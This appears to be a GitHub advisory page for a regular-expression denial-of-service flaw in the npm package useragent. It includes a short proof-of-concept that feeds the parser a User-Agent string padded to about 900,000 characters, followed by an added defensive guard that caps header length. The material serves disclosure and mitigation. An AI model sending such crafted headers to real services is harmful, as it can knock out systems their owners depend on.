GHSA-pjmx-9xr3-82qr

GitHub Security Advisory

ReDoS via long UserAgent header in useragent

GitHub Reviewed | Severity: HIGH | Has CVE

Advisory Details

Affected versions of `useragent` are vulnerable to regular expression denial of service when an arbitrarily long `User-Agent` header is parsed.

## Proof of Concept
```js
var useragent = require('useragent');

var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));
```

## Recommendation

Update to version 2.1.13 or later.
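
Where the upgrade cannot be rolled out immediately, bounding the header length before any regex-based parser sees it removes the arbitrarily long input the advisory describes. The following is an added example, not code from the advisory or the `useragent` project; `MAX_UA_LENGTH`, `boundedUserAgent`, `parseGuarded` and the stub parser are hypothetical names, and the 512-character cap is an assumption.

```javascript
'use strict';

// Assumed cap: genuine browser User-Agent strings are a few hundred characters.
const MAX_UA_LENGTH = 512;

// Return a bounded User-Agent string from a Node-style headers object
// (Node's http module lowercases header names).
// mode 'truncate' cuts the value to maxLen; mode 'reject' discards it entirely.
function boundedUserAgent(headers, { maxLen = MAX_UA_LENGTH, mode = 'truncate' } = {}) {
  let ua = headers && headers['user-agent'];
  if (Array.isArray(ua)) ua = ua[0]; // defensive: some frameworks expose arrays
  if (typeof ua !== 'string') return { ua: '', oversized: false, originalLength: 0 };

  const originalLength = ua.length;
  const oversized = originalLength > maxLen;
  if (oversized) ua = mode === 'reject' ? '' : ua.slice(0, maxLen);
  return { ua, oversized, originalLength };
}

// Wrap any regex-based parser (parseFn is a hypothetical stand-in for a UA
// library's parse function) so that it only ever receives bounded input.
function parseGuarded(parseFn, headers, opts) {
  const { ua, oversized, originalLength } = boundedUserAgent(headers, opts);
  if (oversized) {
    // Oversized values are worth logging: legitimate clients do not send them.
    console.warn(`user-agent of ${originalLength} chars exceeded cap`);
  }
  return { result: parseFn(ua), oversized };
}

// Constructed sample input with the same shape as the advisory's proof of concept.
const sample = { 'user-agent': 'MSIE 0.0' + '0'.repeat(900000) + 'XBLWP' };
const seen = [];
const stubParser = (s) => { seen.push(s.length); return { family: 'stub' }; };
console.log(parseGuarded(stubParser, sample), seen);
```

The guard is a stopgap for unpatched deployments; the fix named in the recommendation is still the upgrade.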

Affected Packages

npm useragent
Affected versions: 0 (fixed in 2.1.13)

Key Information

GHSA ID: GHSA-pjmx-9xr3-82qr
Published: July 24, 2018 7:59 PM
Last Modified: September 6, 2023 8:07 PM
CVSS Score: 7.5 / 10
Primary Ecosystem: npm
Primary Package: useragent
GitHub Reviewed: Yes

Dataset

Last updated: August 29, 2025 6:30 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.